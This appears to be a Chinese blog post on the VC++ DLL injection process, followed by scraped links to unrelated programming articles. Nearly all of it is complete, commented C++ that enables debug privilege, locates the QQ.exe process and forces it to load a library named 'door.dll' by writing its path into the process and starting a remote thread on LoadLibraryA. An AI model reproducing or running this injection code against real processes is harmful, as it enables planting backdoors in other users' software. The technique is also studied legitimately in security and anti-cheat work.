VC++注射过程
2014/10/19 11:12
// stdafx.h :
//
//
// #pragma once #include "targetver.h" #include <stdio.h>
#include <tchar.h> //myself
#include <Windows.h> #include <TlHelp32.h> #include <iostream>
using namespace std; // TODO:
// Inject.cpp :
// #include "stdafx.h" /*
*
*/
int EnableDebugePriv(const char * name){ HANDLE hToken;
/*
*
* PrivilegeCount the number of entries in the Privileges array
* Privileges[ANYSIZE_ARRAY]
* LUID
* SE_PRIVILEGE_ENABLED
*/
TOKEN_PRIVILEGES tp;
/*
* locally unique identifier (LUID) is guaranteed only until the system is restarted.
* call the LookupPrivilegeName function, passing the address of the LUID as the value of the lpLuid parameter.
*/
LUID luid; /*
* The OpenProcessToken function opens the access token associated with a process.
* ProcessHandle [in]: A handle to the process whose access token is opened.
* DesiredAccess [in]Required to enable or disable the privileges in an access token.
* TokenHandle [out] A pointer to a handle that identifies the newly opened access token when the function returns.
*/
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken); /*
* [lpSystemName]- [in, optional] :If a null string is specified, the function attempts to find the privilege name on the local system.
* [lpName]-[in] :
* [lpLuid]-[out] : LUID
*/
LookupPrivilegeValue(NULL,name,&luid); tp.PrivilegeCount=1;
tp.Privileges[0].Luid=luid;
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; /*
* Enabling or disabling privileges in an access token requires TOKEN_ADJUST_PRIVILEGES access.
* TokenHandle [in]: The handle must have TOKEN_ADJUST_PRIVILEGES access to the token. If the PreviousState parameter is not NULL,
* the handle must also have TOKEN_QUERY access.
* DisableAllPrivileges [in]: Specifies whether the function disables all of the token's privileges.If it is FALSE, the function
* modifies privileges based on the information pointed to by the NewState parameter.
* NewState [in, optional]: the DisableAllPrivileges parameter is FALSE, the AdjustTokenPrivileges function enables,
* disables, or removes these privileges for the token.
* BufferLength [in]: Specifies the size, in bytes, of the buffer pointed to by the PreviousState parameter.
* PreviousState [out, optional]: If the PrivilegeCount member of TOKEN_PRIVILEGES is zero,
* then no privileges have been changed by this function. This parameter can be NULL.
* ReturnLength [out, optional]: pointer to a variable that receives the required size, in bytes, of the buffer pointed to
* by the PreviousState parameter. This parameter can be NULL if PreviousState is NULL.
*
*/
AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); return 0; } BOOL InjectDLL(const char * DllFullPath, const DWORD dwRemoteProcessId){ HANDLE hRemoteProcess;
/*
*
*/
EnableDebugePriv(SE_DEBUG_NAME); //
/*
* Opens an existing local process object.
* dwDesiredAccess [in] :
* bInheritHandle [in]
* dwProcessId [in] : The identifier of the local process to be opened.
*/
hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId); char * pszLibFileRemote;
//VirtualAllocExDLL
/*
* Reserves or commits a region of memory within the virtual address space of a specified process.
* The function initializes the memory it allocates to zero
* hProcess [in] : The handle to a process. The function allocates memory within the virtual address space of this process.
* lpAddress [in, optional] : If lpAddress is NULL, the function determines where to allocate the region.
* dwSize [in] : The size of the region of memory to allocate, in bytes.
* flAllocationType [in] : The type of memory allocation.
* flProtect [in] :The memory protection for the region of pages to be allocated.
*/
pszLibFileRemote=(char *)VirtualAllocEx(hRemoteProcess,NULL,lstrlen(DllFullPath)+1,MEM_COMMIT,PAGE_READWRITE); //WriteProcessMemoryDLL
/*
* Writes data to an area of memory in a specified process.
* hProcess [in] A handle to the process memory to be modified.
* lpBaseAddress [in] A pointer to the base address in the specified process to which data is written.
* lpBuffer [in] A pointer to the buffer that contains data to be written in the address space of the specified process.
* nSize [in] The number of bytes to be written to the specified process.
* lpNumberOfBytesWritten [out] If lpNumberOfBytesWritten is NULL, the parameter is ignored.
*
*/
WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL); //LoadLibraryA()
//LoadLibraryA
/*
* Retrieves() the address of an exported function or variable from the specified dynamic-link library (DLL).
* hModule [in] : A handle to the DLL module that contains the function or variable.
* The LoadLibrary, LoadLibraryEx, LoadPackagedLibrary, or GetModuleHandle function returns this handle.
* lpProcName [in] The function or variable name, or the function's ordinal value. If this parameter is an ordinal value,
* it must be in the low-order word; the high-order word must be zero.
*/ //LoadLibraryA
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")),"LoadLibraryA"); //LoadLibraryA
HANDLE hRemoteThread; /*
* Creates a thread that runs in the virtual address space of another process.
* hProcess [in] : A handle to the process in which the thread is to be created.
* lpThreadAttributes [in] : A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor
* for the new thread and determines whether child processes can inherit the returned handle.
* If lpThreadAttributes is NULL, the thread gets a default security descriptor and the handle
* cannot be inherited.
* dwStackSize [in] : The initial size of the stack, in bytes.If this parameter is 0 (zero),
* the new thread uses the default size for the executable.
* lpStartAddress [in] : A pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
* and represents the starting address of the thread in the remote process.
* lpParameter [in] : A pointer to a variable to be passed to the thread function.
* dwCreationFlags [in] : The flags that control the creation of the thread.
* lpThreadId [out] :
*/
if((hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){ cout<<""<<endl;
return FALSE;
} //
CloseHandle(hRemoteThread);
CloseHandle(hRemoteProcess); return TRUE;
} DWORD GetProcessId(){
DWORD Pid=-1; /*
* Takes a snapshot of the specified processes
* dwFlags [in]: TH32CS_SNAPPROCESS-Includes all processes in the system in the snapshot.
* th32ProcessID [in]: The process identifier of the process to be included in the snapshot.
* This parameter can be zero to indicate the current process. This parameter is used when the TH32CS_SNAPHEAPLIST,
* TH32CS_SNAPMODULE, TH32CS_SNAPMODULE32, or TH32CS_SNAPALL value is specified.
* Otherwise, it is ignored and all processes are included in the snapshot.
*/
HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //
/*
* Describes an entry from a list of the processes residing in the system address space when a snapshot was taken.
* th32ProcessID: The process identifier.
* szExeFile : The name of the executable file for the process.
*/
PROCESSENTRY32 lPrs;
ZeroMemory(&lPrs,sizeof(PROCESSENTRY32));
lPrs.dwSize=sizeof(lPrs);
char * TargetFile="QQ.exe"; /*
* Retrieves information about the first process encountered in a system snapshot.
* hSnapshot [in] : A handle to the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.
* lppe [in, out] : A pointer to a PROCESSENTRY32 structure.
*/
Process32First(hSnap,&lPrs);
if(strstr(TargetFile,lPrs.szExeFile)!=NULL){
Pid=lPrs.th32ProcessID;
return Pid;
}
while(1){
ZeroMemory(&lPrs,sizeof(PROCESSENTRY32));
lPrs.dwSize=sizeof(lPrs); /*
* Returns TRUE if the next entry of the process list has been copied to the buffer or FALSE otherwise.
* The comparison is case-sensitive.
*/
if(!Process32Next(hSnap,&lPrs)){ Pid=-1;
break;
}
/*
* Returns the address of the first occurrence of the matching substring if successful, or NULL otherwise.
*/
if(strstr(TargetFile,lPrs.szExeFile)!=NULL){ Pid=lPrs.th32ProcessID;
break;
} }
return Pid;
} int _tmain(int argc, _TCHAR* argv[])
{
char myFile[MAX_PATH];
GetCurrentDirectory(MAX_PATH,myFile); //myFile
strcat(myFile,"\\door.dll");
InjectDLL(myFile,GetProcessId()); return 0;
}
ALL
VC++注射过程的更多相关文章
- VC++ 编译过程
一 前言 一开始编译C++代码的时候可能会对编译的错误觉得很难理解,搞不清楚究竟是哪里错了.了解编译过程,能够更好的处理编译错误. 二 名词解释 编译单元:当一个c或cpp文件在编译时,预处理器首先递 ...
- 解决VC++6.0打开文件或添加文件到工程出错的问题
相信很多朋友在安装VC++6.0之后,发现无法使用打开文件命令.同时,打开了工程,却无法实现文件添加到工程的问题.一旦进行如此操作,便会出现应用程序错误,需要关闭应用程序.为此,不胜其烦.更有甚者,以 ...
- GADL配置编译
GADL配置编译 文章1:Win7(32/64)VS2010配置编译GDAL环境(图文教程+亲测可用!) 转载:http://malagis.com/win7-vs2010-gdal.html 近的一 ...
- 【转】COM技术内幕(笔记)
COM技术内幕(笔记) COM--到底是什么?--COM标准的要点介绍,它被设计用来解决什么问题?基本元素的定义--COM术语以及这些术语的含义.使用和处理COM对象--如何创建.使用和销毁COM对象 ...
- Win7(32/64)VS2010配置编译GDAL环境(图文教程+亲测可用!)
最近的一个VS2010的项目中用到了GDAL,关于GDAL这个库的说明与赞美,这里就不赘述了,下面是在VS2010中配置GDAL的详细过程. 系统说明 Win7(32位/64位),VS2010,GDA ...
- [异常] VC6.0 error LNK2001: unresolved external symbol _main解决办法
来自:http://www.douban.com/note/65638800/ 学习VC++时经常会遇到链接错误LNK2001,该错误非常讨厌,因为对于编程者来说,最好改的错误莫过于编译错误,而一般说 ...
- VC6.0 error LNK2001: unresolved external symbol _main解决办法
学习VC++时经常会遇到链接错误LNK2001,该错误非常讨厌,因为对于编程者来说,最好改的错误莫过于编译错误,而一般说来发生连接错误时,编译都已通过.产生连接错误的原因非常多,尤其LNK2001错误 ...
- VC6.0 error LNK2001: unresolved external symbol _main(转)
学习VC++时经常会遇到链接错误LNK2001,该错误非常讨厌,因为对于编程者来说,最好改的错误莫过于编译错误,而一般说来发生连接错误时,编译都已通过.产生连接错误的原因非常多,尤其LNK2001错误 ...
- GDI+编程说明及小结
原文地址:http://blog.csdn.net/byxdaz/article/details/5972759 GDI+(Graphics Device Interface Plus图形设备接口加) ...
随机推荐
- 微软Visual Studio "14" CTP 2 公布
对于在微软阵营下进行工作的团队来说,拥有最新版本号的Visual Studio是提高效率最佳的选择,没有之中的一个. 在本文中,我们就上个月公布的Visual Studio "14&q ...
- Android 定义自己的学习(5)它们的定义Progressbar
它们的定义View最后的研究,首先在效果图. watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdTAxNDE2MzcyNg==/font/5a6L5L2T/f ...
- newlisp获得bash该命令的退出状态
newlisp exec你可以运行bash命令.但如何返回状态来运行它? 特别是,我需要监控hdfs dfs -test 结果返回.经过一番摸索,我发现了一个简单的答案: #!/usr/bin/new ...
- python_小爬虫
import urllib.request as request import urllib.parse as parse import string print(""" ...
- Swift中文教程(四)--函数与闭包
原文:Swift中文教程(四)--函数与闭包 Function 函数 Swift使用func关键字来声明变量,函数通过函数名加小括号内的参数列表来调用.使用->来区分参数名和返回值的类型: fu ...
- 【百度地图API】如何利用PhoneGap制作地图APP
原文:[百度地图API]如何利用PhoneGap制作地图APP 摘要:百度地图API是一套由javascript编写的地图程序接口,按说它应该运行在浏览器上.现在,只要利用PhoneGap,我们就能开 ...
- Duanxx的STM32学习:NVIC操作
版权声明:本文博客原创文章,博客,未经同意,不得转载.
- 认识bash这个shell
我们通过shell将我们输入的命令与内核通信,好让内核可以控制硬件来正确无误地工作bash是我们Linux默认的shell 用户界面(Shell,application)--------核心(Kern ...
- TLD跟踪算法优化(一)并行化
才学疏浅,仅仅言片语,仅仅求志同道的朋友一起交流研究. 并行化不算是算法的改进,仅仅是追求执行的实时性. 简要列举一个样例: TLD算法的C++版本号源代码里: LKTracker::trackf2f ...
- Yii Framework2.0开发教程(10)配合mysql数据库实现用户登录
1.首先在mysql创建一个存用户的表格 create table test_user ( user_id bigint(20) unsigned not null auto_increment co ...